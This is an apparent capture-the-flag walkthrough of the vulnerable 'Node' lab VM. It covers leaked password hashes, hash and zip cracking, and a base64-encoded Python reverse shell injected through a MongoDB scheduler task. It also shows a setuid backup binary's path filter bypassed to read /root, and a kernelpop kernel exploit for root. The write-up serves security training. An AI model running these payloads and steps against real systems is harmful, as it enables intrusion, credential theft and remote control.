About the Machine
Description: Node is a medium level boot2root challenge, originally created for HackTheBox. There are two flags to find (user and root flags) and multiple different technologies to play with. The OVA has been tested on both VMware and Virtual Box.
Vulnhub Page:
https://www.vulnhub.com/entry/node-1,252/
Download Page:
https://download.vulnhub.com/node/Node.ova
Walkthrough
Let's start by locating the machine.
┌──(root💀kali)-[~]
└─# arp-scan -l | grep "08:00:27:b8:f3:33"
192.168.110.4 08:00:27:b8:f3:33 PCS Systemtechnik GmbH
┌──(root💀kali)-[~]
└─# ifconfig eth0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.110.3 netmask 255.255.255.0 broadcast 192.168.110.255
inet6 fe80::a00:27ff:fe8b:5efb prefixlen 64 scopeid 0x20<link>
ether 08:00:27:8b:5e:fb txqueuelen 1000 (Ethernet)
RX packets 62 bytes 9857 (9.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5567 bytes 336524 (328.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Let's continue with an nmap scan.
[*] Scan: 168
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-07 09:10 EDT
Nmap scan report for 192.168.110.4
Host is up (0.00096s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
MAC Address: 08:00:27:B8:F3:33 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.96 ms 192.168.110.4
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.58 seconds
We have a Node.js application running on port 3000. After browsing around it for a while, I started analysing the traffic with Burp and caught an interesting API response.
GET /api/users/latest HTTP/1.1
Host: 192.168.110.4:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: connect.sid=s%3AAIG_kuzVAZJ3cGqwPpRU9i8TSa6787wQ.P24GUCYwUu%2Fx08mlqD1orDQXT29wYaR398WH4hvG9T0
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 611
ETag: W/"263-mJMXKDfX6c4pdWF3bLjHuBIvsM0"
Date: Wed, 07 Jul 2021 09:14:42 GMT
Connection: close
[{"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},{"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},{"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}]
I cracked the hashes of some of these users online:
tom = f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240:spongebob
mark = de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73:snowflake
But when I logged in, it showed me a warning despite my being logged in, and I think there is a backup file. I couldn't download that backup file with these users. So I kept investigating, and when I sent a request to the /api/users/ API myself I found a new user. I then cracked this user's hash, logged in with it, and downloaded a backup file.
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 611
ETag: W/"263-mJMXKDfX6c4pdWF3bLjHuBIvsM0"
Date: Wed, 07 Jul 2021 09:14:42 GMT
Connection: close
[{"_id":"59a7365b98aa325cc03ee51c","username":"myP14ceAdm1nAcc0uNT","password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af","is_admin":true},{"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},{"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},{"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}]
myP14ceAdm1nAcc0uNT = dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af:manchester
None of the users had SSH access. So I started looking at the backup file.
┌──(root💀kali)-[~/oscp/node]
└─# file myplace.backup
myplace.backup: ASCII text, with very long lines, with no line terminators
┌──(root💀kali)-[~/oscp/node]
└─# cat myplace.backup | base64 -d >> result
┌──(root💀kali)-[~/oscp/node]
└─# file result
result: Zip archive data, at least v1.0 to extract
┌──(root💀kali)-[~/oscp/node]
└─# unzip result
Archive: result
[result] var/www/myplace/package-lock.json password:
As we can see, we are faced with an encrypted zip. So I used john and cracked the password.
┌──(root💀kali)-[~/oscp/node]
└─# /usr/sbin/zip2john result >> result-hash 2>/dev/null
┌──(root💀kali)-[~/oscp/node]
└─# cat result-hash
result:$pkzip2$3*2*1*0*8*24*9c88*1223*d3839f108d43fbf4655350f9e7b689cb6a888ebe30027e275c13ee723df07d2de2eda50a*1*0*8*24*37ef*0145*a149d75e6d8ac49cf9e74103048490c2f6e38c814f5f9a35c706d2a1e79945e40b903105*2*0*11*5*118f1dfc*94cb*67*0*11*118f*3d0f*71f9f028888da1a229e6d407e5852a8aff*$/pkzip2$::result:var/www/myplace/node_modules/qs/.eslintignore, var/www/myplace/node_modules/serve-static/README.md, var/www/myplace/package-lock.json:result
┌──(root💀kali)-[~/oscp/node]
└─# rm -rf /root/.john
┌──(root💀kali)-[~/oscp/node]
└─# john result-hash --wordlist=/usr/share/wordlists/rockyou.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
magicword (result)
1g 0:00:00:00 DONE (2021-07-07 09:23) 33.33g/s 6144Kp/s 6144Kc/s 6144KC/s sandrea..joan08
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Now we can open it.
┌──(root💀kali)-[~/oscp/node]
└─# unzip result
Archive: result
[result] var/www/myplace/package-lock.json password:
....
inflating: var/www/myplace/static/vendor/angular/angular-route.min.js
inflating: var/www/myplace/static/vendor/angular/angular.min.js
creating: var/www/myplace/static/vendor/bootstrap/
creating: var/www/myplace/static/vendor/bootstrap/css/
inflating: var/www/myplace/static/vendor/bootstrap/css/bootstrap.min.css
inflating: var/www/myplace/static/vendor/bootstrap/css/bootstrap.css
creating: var/www/myplace/static/vendor/bootstrap/fonts/
inflating: var/www/myplace/static/vendor/bootstrap/fonts/glyphicons-halflings-regular.eot
inflating: var/www/myplace/static/vendor/bootstrap/fonts/glyphicons-halflings-regular.svg
inflating: var/www/myplace/static/vendor/bootstrap/fonts/glyphicons-halflings-regular.ttf
inflating: var/www/myplace/static/vendor/bootstrap/fonts/glyphicons-halflings-regular.woff
inflating: var/www/myplace/static/vendor/bootstrap/fonts/glyphicons-halflings-regular.woff2
creating: var/www/myplace/static/vendor/bootstrap/js/
inflating: var/www/myplace/static/vendor/bootstrap/js/bootstrap.min.js
inflating: var/www/myplace/static/vendor/bootstrap/js/bootstrap.js
creating: var/www/myplace/static/assets/
creating: var/www/myplace/static/assets/css/
inflating: var/www/myplace/static/assets/css/freelancer.css
inflating: var/www/myplace/static/assets/css/app.css
inflating: var/www/myplace/static/assets/css/freelancer.min.css
creating: var/www/myplace/static/assets/js/
creating: var/www/myplace/static/assets/js/misc/
inflating: var/www/myplace/static/assets/js/misc/freelancer.min.js
creating: var/www/myplace/static/assets/js/app/
inflating: var/www/myplace/static/assets/js/app/app.js
creating: var/www/myplace/static/assets/js/app/controllers/
inflating: var/www/myplace/static/assets/js/app/controllers/admin.js
inflating: var/www/myplace/static/assets/js/app/controllers/profile.js
inflating: var/www/myplace/static/assets/js/app/controllers/login.js
inflating: var/www/myplace/static/assets/js/app/controllers/home.js
creating: var/www/myplace/static/partials/
inflating: var/www/myplace/static/partials/admin.html
inflating: var/www/myplace/static/partials/login.html
inflating: var/www/myplace/static/partials/home.html
inflating: var/www/myplace/static/partials/profile.html
inflating: var/www/myplace/app.html
From inside the project I obtained the mark user's password and was able to connect via SSH.
┌──(root💀kali)-[~/…/node/var/www/myplace]
└─# ls
app.html app.js node_modules package.json package-lock.json static
┌──(root💀kali)-[~/…/node/var/www/myplace]
└─# cat app.js
const express = require('express');
const session = require('express-session');
const bodyParser = require('body-parser');
const crypto = require('crypto');
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const path = require("path");
const spawn = require('child_process').spawn;
const app = express();
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
MongoClient.connect(url, function(error, db) {
  if (error || !db) {
    console.log('[!] Failed to connect to mongodb');
    return;
...
┌──(root💀kali)-[~/…/node/var/www/myplace]
└─# ssh [email protected]
[email protected]'s password:
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
.-.
.-'``(|||)
,`\ \ `-`. 88 88
/ \ '``-. ` 88 88
.-. , `___: 88 88 88,888, 88 88 ,88888, 88888 88 88
(:::) : ___ 88 88 88 88 88 88 88 88 88 88 88
`-` ` , : 88 88 88 88 88 88 88 88 88 88 88
\ / ,..-` , 88 88 88 88 88 88 88 88 88 88 88
`./ / .-.` '88888' '88888' '88888' 88 88 '8888 '88888'
`-..-( )
`-`
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Wed Jul 7 11:10:20 2021 from 192.168.110.3
mark@node:~$
From the information above we understand that there is a MongoDB connection. When I got in and checked, I also saw a MongoDB instance running on 127.0.0.1.
After poking around inside for a while, I ran my enumeration scripts; the interesting results I obtained are below.
[*] usr020 Are there other users in an administrative groups?.............. yes!
---
sudo:x:27:tom
---
[!] fst020 Uncommon setuid binaries........................................ yes!
---ore--(7%)
/usr/local/bin/backup
---ore--(7%)
================================================================( network )=====
[*] net000 Services listening only on localhost............................ yes!
---
tcp LISTEN 0 128 127.0.0.1:27017 *:*
---
------ tom ------
START PID USER COMMAND
09:18 1170 tom /usr/bin/node /var/www/myplace/app.js
09:18 1161 tom /usr/bin/node /var/scheduler/app.js
I think the machine wants us to switch to the tom user. tom is also a member of sudo. So I focused on the tom user. Besides the normal application, I also saw a second project running: /var/scheduler/app.js.
mark@node:/home/tom$ cat /var/scheduler/app.js
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';
MongoClient.connect(url, function(error, db) {
  if (error || !db) {
    console.log('[!] Failed to connect to mongodb');
    return;
  }
  setInterval(function () {
    db.collection('tasks').find().toArray(function (error, docs) {
      if (!error && docs) {
        docs.forEach(function (doc) {
          if (doc) {
            console.log('Executing task ' + doc._id + '...');
            exec(doc.cmd);
            db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
          }
        });
      }
      else if (error) {
        console.log('Something went wrong: ' + error);
      }
    });
  }, 30000);
});
Reading the source, every 30000 milliseconds it executes the cmd value of each document in the tasks collection of the scheduler database in MongoDB. Since the connection string is in the source code, I connected to the db. I made a few attempts but couldn't get a reverse shell with nc. So I got a reverse shell with a combination of python and base64.
┌──(root💀kali)-[~/oscp/node]
└─# nano payload
┌──(root💀kali)-[~/oscp/node]
└─# cat payload
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.3",1822));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
┌──(root💀kali)-[~/oscp/node]
└─# cat payload | base64 >> payloadBase64
┌──(root💀kali)-[~/oscp/node]
└─# cat payloadBase64
cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNv
Y2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4xMTAu
MyIsMTgyMikpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpO29z
LmR1cDIocy5maWxlbm8oKSwyKTtpbXBvcnQgcHR5OyBwdHkuc3Bhd24oIi9iaW4vYmFzaCIpJwo=
So, with the preparation above, we can get a reverse shell with the payload echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4xMTAuMyIsMTgyMikpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtpbXBvcnQgcHR5OyBwdHkuc3Bhd24oIi9iaW4vYmFzaCIpJwo= | base64 -d | bash.
Let's connect to Mongo. Of course, first let's start our nc listener.
mark@node:/home/tom$ mongo mongodb://localhost:27017/scheduler?authSource=scheduler --username mark --password 5AYRft73VtFpc84k
MongoDB shell version: 3.2.16
connecting to: mongodb://localhost:27017/scheduler?authSource=scheduler
> show collections
tasks
> db.tasks.insert({"cmd":"echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4xMTAuMyIsMTgyMikpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtpbXBvcnQgcHR5OyBwdHkuc3Bhd24oIi9iaW4vYmFzaCIpJwo= | base64 -d | bash"})
WriteResult({ "nInserted" : 1 })
┌──(root💀kali)-[~/oscp/node]
└─# nc -lvp 1822
listening on [any] 1822 ...
id
192.168.110.4: inverse host lookup failed: Host name lookup failure
connect to [192.168.110.3] from (UNKNOWN) [192.168.110.4] 53306
id
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
tom@node:/$ id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1002(admin)
tom@node:/$
Great! Let's get the first flag then.
tom@node:/$ id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1002(admin)
tom@node:/$ pwd
pwd
/
tom@node:/$ cd /home
cd /home
tom@node:/home$ ls
ls
frank mark tom
tom@node:/home$ cd tom
cd tom
tom@node:~$ ls
ls
user.txt
tom@node:~$ cat user.txt
cat user.txt
e1156acc3574e04b06908ecf76be91b1
While investigating as the tom user I found the following.
tom@node:~$ ls -al /usr/local/bin/backup
ls -al /usr/local/bin/backup
-rwsr-xr-- 1 root admin 16484 Sep 3 2017 /usr/local/bin/backup
tom@node:~$
tom@node:~$ cat /etc/group | grep admin
cat /etc/group | grep admin
lpadmin:x:115:tom
admin:x:1002:tom,root
At the same time, this file is used in the source code of the nodejs application running on port 3000...
...
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
...
app.get('/api/admin/backup', function (req, res) {
  if (req.session.user && req.session.user.is_admin) {
    var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
    var backup = '';
    proc.on("exit", function(exitCode) {
      res.header("Content-Type", "text/plain");
      res.header("Content-Disposition", "attachment; filename=myplace.backup");
      res.send(backup);
    });
    proc.stdout.on("data", function(chunk) {
      backup += chunk;
    });
    proc.stdout.on("end", function() {
    });
  }
  else {
    res.send({
      authenticated: false
    });
  }
});
app.use(function(req, res, next){
  res.sendFile('app.html', { root: __dirname });
});
I made an attempt and it succeeded. I can now read any file I want.
tom@node:~$ /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /home/tom/user.txt
UEsDBAoACQAAAJd9I0se46vsLQAAACEAAAARABwAaG9tZS90b20vdXNlci50eHRVVAkAA14VrFlHlOVgdXgLAAEEAAAAAAToAwAA4auXGEOS4yfI2nb9XesHFE/b4HIcUdOHuq3W8XQYS+ruCXOnq028OZDlxi2dUEsHCB7jq+wtAAAAIQAAAFBLAQIeAwoACQAAAJd9I0se46vsLQAAACEAAAARABgAAAAAAAEAAACggQAAAABob21lL3RvbS91c2VyLnR4dFVUBQADXhWsWXV4CwABBAAAAAAE6AMAAFBLBQYAAAAAAQABAFcAAACIAAAAAAA=tom@node:~$
Thereupon:
┌──(root💀kali)-[~/oscp/node]
└─# echo UEsDBAoACQAAAJd9I0se46vsLQAAACEAAAARABwAaG9tZS90b20vdXNlci50eHRVVAkAA14VrFlHlOVgdXgLAAEEAAAAAAToAwAA4auXGEOS4yfI2nb9XesHFE/b4HIcUdOHuq3W8XQYS+ruCXOnq028OZDlxi2dUEsHCB7jq+wtAAAAIQAAAFBLAQIeAwoACQAAAJd9I0se46vsLQAAACEAAAARABgAAAAAAAEAAACggQAAAABob21lL3RvbS91c2VyLnR4dFVUBQADXhWsWXV4CwABBAAAAAAE6AMAAFBLBQYAAAAAAQABAFcAAACIAAAAAAA= | base64 -d
PK
�}#K��-!home/tom/user.txtUT ^�YG��`ux
�C��'��v�]�O��rQӇ����tK�� s��M�9���-�P��-!PK
�}#K��-!��home/tom/user.txtUT^�Yux
�PKW�
┌──(root💀kali)-[~/oscp/node]
└─# echo UEsDBAoACQAAAJd9I0se46vsLQAAACEAAAARABwAaG9tZS90b20vdXNlci50eHRVVAkAA14VrFlHlOVgdXgLAAEEAAAAAAToAwAA4auXGEOS4yfI2nb9XesHFE/b4HIcUdOHuq3W8XQYS+ruCXOnq028OZDlxi2dUEsHCB7jq+wtAAAAIQAAAFBLAQIeAwoACQAAAJd9I0se46vsLQAAACEAAAARABgAAAAAAAEAAACggQAAAABob21lL3RvbS91c2VyLnR4dFVUBQADXhWsWXV4CwABBAAAAAAE6AMAAFBLBQYAAAAAAQABAFcAAACIAAAAAAA= | base64 -d >> test.zip
┌──(root💀kali)-[~/oscp/node]
└─# unzip test.zip
Archive: test.zip
[test.zip] home/tom/user.txt password:
extracting: home/tom/user.txt
┌──(root💀kali)-[~/oscp/node]
└─# ls
gobuster1 hash home hydra-ssh istek myplace.backup passwords payload payloadBase64 result result-hash result.zip test.zip users var
┌──(root💀kali)-[~/oscp/node]
└─# cd home
┌──(root💀kali)-[~/oscp/node/home]
└─# ls
tom
┌──(root💀kali)-[~/oscp/node/home]
└─# cd tom
┌──(root💀kali)-[~/oscp/node/home/tom]
└─# ls
user.txt
┌──(root💀kali)-[~/oscp/node/home/tom]
└─# cat user.txt
e1156acc3574e04b06908ecf76be91b1
We repeated what we did when downloading from the same nodejs application. Given this, I can read the root folder directly, but then I won't actually have become root. An interesting dilemma. If the machine wants me to read the flag, fine, but I want to be root.
First of all, I was wrong... 😀
We can't read every path we want. The reason, as far as I understand, is that there are some restrictions in the code. When I traced a file I could read, I got the results below.
tom@node:/$ ltrace /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /home/tom/user.txt
__libc_start_main(0x80489fd, 4, 0xff936f14, 0x80492c0 <unfinished ...>
geteuid() = 1000
setuid(1000) = 0
strcmp("-q", "-q") = 0
strncpy(0xff936dd8, "45fac180e9eee72f4fd2d9386ea7033e"..., 100) = 0xff936dd8
strcpy(0xff936dc1, "/") = 0xff936dc1
strcpy(0xff936dcd, "/") = 0xff936dcd
strcpy(0xff936d57, "/e") = 0xff936d57
strcat("/e", "tc") = "/etc"
strcat("/etc", "/m") = "/etc/m"
strcat("/etc/m", "yp") = "/etc/myp"
strcat("/etc/myp", "la") = "/etc/mypla"
strcat("/etc/mypla", "ce") = "/etc/myplace"
strcat("/etc/myplace", "/k") = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey") = "/etc/myplace/key"
strcat("/etc/myplace/key", "s") = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r") = 0x99ad008
fgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x99ad008) = 0xff93696f
strcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "a01a6aa5aaf1d7729f35c8278daae30f"...) = -1
fgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x99ad008) = 0xff93696f
strcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "45fac180e9eee72f4fd2d9386ea7033e"...) = 0
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x99ad008) = 0xff93696f
strcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "3de811f4ab2b7543eaf45df611c2dd25"...) = 1
fgets("\n", 1000, 0x99ad008) = 0xff93696f
strcspn("\n", "\n") = 0
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "") = 1
fgets(nil, 1000, 0x99ad008) = 0
strstr("/home/tom/user.txt", "..") = nil
strstr("/home/tom/user.txt", "/root") = nil
strchr("/home/tom/user.txt", ';') = nil
strchr("/home/tom/user.txt", '&') = nil
strchr("/home/tom/user.txt", '`') = nil
strchr("/home/tom/user.txt", '$') = nil
strchr("/home/tom/user.txt", '|') = nil
strstr("/home/tom/user.txt", "//") = nil
strcmp("/home/tom/user.txt", "/") = 1
strstr("/home/tom/user.txt", "/etc") = nil
strcpy(0xff93677b, "/home/tom/user.txt") = 0xff93677b
getpid() = 14402
time(0) = 1625669127
clock(0, 0, 0, 0) = 1865
srand(0x3299b689, 0xc72a607a, 0x3299b689, 0x804918c) = 0
rand(0, 0, 0, 0) = 0x3e46ace5
sprintf("/tmp/.backup_1044819173", "/tmp/.backup_%i", 1044819173) = 23
sprintf("/usr/bin/zip -r -P magicword /tm"..., "/usr/bin/zip -r -P magicword %s "..., "/tmp/.backup_1044819173", "/home/tom/user.txt") = 83
system("/usr/bin/zip -r -P magicword /tm"... <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 0
access("/tmp/.backup_1044819173", 0) = 0
sprintf("/usr/bin/base64 -w0 /tmp/.backup"..., "/usr/bin/base64 -w0 %s", "/tmp/.backup_1044819173") = 43
system("/usr/bin/base64 -w0 /tmp/.backup"...UEsDBAoACQAAAJd9I0se46vsLQAAACEAAAARABwAaG9tZS90b20vdXNlci50eHRVVAkAA14VrFlHlOVgdXgLAAEEAAAAAAToAwAAcqtGwp+gTiVnNFvcUs8ZqOQDSs50Dsv9+FZqgtXg21h+fhf8qZbFg01CTUbAUEsHCB7jq+wtAAAAIQAAAFBLAQIeAwoACQAAAJd9I0se46vsLQAAACEAAAARABgAAAAAAAEAAACggQAAAABob21lL3RvbS91c2VyLnR4dFVUBQADXhWsWXV4CwABBAAAAAAE6AMAAFBLBQYAAAAAAQABAFcAAACIAAAAAAA= <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 0
remove("/tmp/.backup_1044819173") = 0
fclose(0x99ad008) = 0
+++ exited (status 0) +++
I also looked at one I couldn't read.
tom@node:/$ ltrace /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /root
__libc_start_main(0x80489fd, 4, 0xff8c00d4, 0x80492c0 <unfinished ...>
geteuid() = 1000
setuid(1000) = 0
strcmp("-q", "-q") = 0
strncpy(0xff8bff98, "45fac180e9eee72f4fd2d9386ea7033e"..., 100) = 0xff8bff98
strcpy(0xff8bff81, "/") = 0xff8bff81
strcpy(0xff8bff8d, "/") = 0xff8bff8d
strcpy(0xff8bff17, "/e") = 0xff8bff17
strcat("/e", "tc") = "/etc"
strcat("/etc", "/m") = "/etc/m"
strcat("/etc/m", "yp") = "/etc/myp"
strcat("/etc/myp", "la") = "/etc/mypla"
strcat("/etc/mypla", "ce") = "/etc/myplace"
strcat("/etc/myplace", "/k") = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey") = "/etc/myplace/key"
strcat("/etc/myplace/key", "s") = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r") = 0x8e95008
fgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x8e95008) = 0xff8bfb2f
strcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "a01a6aa5aaf1d7729f35c8278daae30f"...) = -1
fgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x8e95008) = 0xff8bfb2f
strcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "45fac180e9eee72f4fd2d9386ea7033e"...) = 0
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x8e95008) = 0xff8bfb2f
strcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\n") = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "3de811f4ab2b7543eaf45df611c2dd25"...) = 1
fgets("\n", 1000, 0x8e95008) = 0xff8bfb2f
strcspn("\n", "\n") = 0
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "") = 1
fgets(nil, 1000, 0x8e95008) = 0
strstr("/root", "..") = nil
strstr("/root", "/root") = "/root"
strcpy(0xff8beb68, "Finished! Encoded backup is belo"...) = 0xff8beb68
printf(" %s[+]%s %s\n", "\033[32m", "\033[37m", "Finished! Encoded backup is belo"... [+] Finished! Encoded backup is below:
) = 51
puts("UEsDBDMDAQBjAG++IksAAAAA7QMAABgK"...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
) = 1525
exit(0 <no return ...>
+++ exited (status 0) +++
As can be seen, the shared and dynamic library calls were printed to the screen, and the program seems to take a different path on expressions containing /root. So I went to the / directory, ran it there, and simply passing root was enough.
tom@node:/$ /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 root
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@node:/$
┌──(root💀kali)-[~/oscp/node]
└─# echo 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 | base64 -d >> root.zip
┌──(root💀kali)-[~/oscp/node]
└─# unzip root.zip
Archive: root.zip
creating: root/
[root.zip] root/.profile password:
inflating: root/.profile
extracting: root/.bash_history
creating: root/.cache/
extracting: root/.cache/motd.legal-displayed
extracting: root/root.txt
inflating: root/.bashrc
creating: root/.nano/
extracting: root/.nano/search_history
┌──(root💀kali)-[~/oscp/node]
└─# cd root
┌──(root💀kali)-[~/oscp/node/root]
└─# ls
root.txt
┌──(root💀kali)-[~/oscp/node/root]
└─# cat root.txt
1722e99ca5f353b362556a62bd5e6be0
Nice, now let's become root. kernelpop is back! I installed this great tool on the machine, and boom!
mark@node:/tmp/kernelpop$ python kernelpop.py -e CVE201716996
##########################
# welcome to kernelpop #
# #
# let's pop some kernels #
##########################
[*] attempting to perform exploitation with exploit CVE201716996
Would you like to run exploit CVE201716996 on this system? (y/n): y
[*] writing the exploit source to disk (/tmp/CVE201716996.c)
[*] compiling exploit CVE201716996 to /tmp/CVE201716996
[*] gcc -o /tmp/CVE201716996 /tmp/CVE201716996.c
[+] compilation successful!
[*] performing exploitation of CVE201716996
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880027e2ce00
[*] Leaking sock struct from ffff880029d86000
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88002b283840
[*] UID from cred structure: 1001, matches the current: 1001
[*] hammering cred structure at ffff88002b283840
[*] credentials patched, launching shell...
# id
